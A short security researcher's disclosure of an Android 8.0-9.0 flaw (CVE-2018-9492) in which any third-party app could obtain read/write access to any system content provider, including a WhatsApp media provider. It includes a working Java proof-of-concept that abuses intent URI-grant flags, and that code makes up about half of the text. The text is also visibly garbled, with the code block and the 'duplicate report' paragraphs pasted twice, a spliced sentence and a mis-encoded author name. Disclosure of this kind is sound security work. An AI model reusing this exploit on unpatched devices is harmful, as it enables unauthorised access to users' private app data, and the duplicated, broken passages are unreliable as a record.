Global grant uri in Android 8.0-9.0 (2018 year)
Any thirdparty application was able to grant read/write access to any exported/non exported, secured by permissions content providers which were installed in system. It did't matter if content provider defined in AndroidManifest with grantUriPermission flag or not, if it was exported or no. Thirdparty were able to access any content provider in system without user interaction.
The Android Security Team believes that this is a duplicate of a report previously submitted by another external researcher on July 26, 2018.
So, for me it was duplicate.
Original bug information is next:
Uri uri =Uri.parse("content://com.whatsapp.provider.media/item/5");
Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(getPackageName(), MainActivity.class.getName());
intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
intent.putExtra(Intent.EXTRA_STREAM, uri);
intent.setType("*/*");
startActivity(intent);
Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(getPackageName(), MainActivity.class.getName());
intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
intent.putExtra(Intent.EXTRA_STREAM, uri);
intent.setType("*/*");
startActivity(intent);
And that's all :) When you launch that code on vulnerable Android your app receives access to passed "uri" value. You can opened any content providers in system!
PoC demo:
This funny bug was reported in 30.08.2018.
And thanThe Android Security Team believes that this is a duplicate of a report previously submitted by another external researcher on July 26, 2018.
So, for me it was duplicate.
Original bug information is next:
- CVE-2018-9492
- Author: MichaĆ Bednarski